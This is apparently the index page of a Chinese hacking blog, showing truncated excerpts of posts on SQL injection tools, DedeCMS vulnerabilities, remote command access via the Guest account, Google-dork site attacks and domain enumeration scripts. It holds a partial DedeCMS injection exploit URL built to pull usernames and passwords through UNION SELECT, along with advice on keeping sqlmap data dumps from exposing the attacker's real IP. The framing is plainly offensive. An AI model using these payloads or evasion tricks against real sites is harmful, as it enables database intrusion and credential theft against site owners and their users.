小马博客

一个无聊的人,一个无聊的博客

SQLNuke是一个功能强大而又简单的MYSQL load_file()函数注入工具。 在Mysql进行SQL注入攻击中,当你需要收集一些服务器的信息,你能想到的最好的方式是从load_file()函数下手,而手工推测的方法会耗费大量的时间,现在SQLNuke可以帮助...

发布 0 条评论

晚餐吃撑了,瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多,赶紧下了套,用editplus搜索了几个关键字,果然发现些问题。(话说平时写代码也喜欢用editplus,小巧方便多年习惯) 出现漏洞的两个文件为: Include/payment/al...

发布 0 条评论

MacOS/Ubuntu等Linux通用的检查VPN脚本,当VPN断线了自动关闭网卡。 问:什么时候会用到? 答:例如sqlmap在半夜dump数据的时候,你在睡觉,VPN断掉了,啊哈哈哈,全是真实IP去DUMP,好玩吧。 原理:ping vpn网关,ping不通N次,则shu...

发布 0 条评论

看见最近大家讨论远程调用cmd比较热,所以就想写一下自己使用远程调用CMD的一些小结 主要细节请参考 http://lcx.cc/?i=3221 我以windows 2003系统做演示. 1.激活本地Guest账号 2.在组策略中将 网络访问: 本地帐户的共享和安全模型 改...

发布 0 条评论

nmap是一款用于网络发现(Network Discovery)和安全审计(Security Auditing)的网络安全工具,它是自由软件。软件名字Nmap是Network Mapper的简称。通常情况下,Nmap用于:   列举网络主机清单 管理服务升级调度 监控主机 ...

发布 0 条评论

作者:qingran 作者网站:www.qingran.me 首先百度搜索关键字:inurl: (mmdatabase.asp) 我随便列举一个:   www.xxxx.com 修改链接:http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1 扔入NBSI 或者啊D等各种...

发布 1 条评论

首先: 注入exp 有时候 有些 /plus/目录换成了 /plugins目录 /plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32...

发布 1 条评论

[php] 打包程序: <% 'On Error Resume Next '容错处理 Server.ScriptTimeOut = 300 '定义脚本超时时间 Dim Fso, Rs, Conn, Stream, AdoCataLog '定义用到的组件 Set Fso = Server.CreateObject("Scripting.FileSystemObject&...

发布 0 条评论

@echo off setlocal ENABLEDELAYEDEXPANSION @FOR /F "usebackq delims=, " %%J IN (`net view /domain ^|find "命令執行成 功" /v ^|find "The command completed successfully." /v ^|find "命...

发布 0 条评论

在实际工作中我们经常会用到对身份证进行验证的操作,比如员工档案中身份信息的管理等等。长达18位的数字谁也不敢说每次都能绝对的输入正确,如果能对输入的身份证进行一下验证的话,会最大限度的保证资料的正确性。 接着我们来说说18...

发布 0 条评论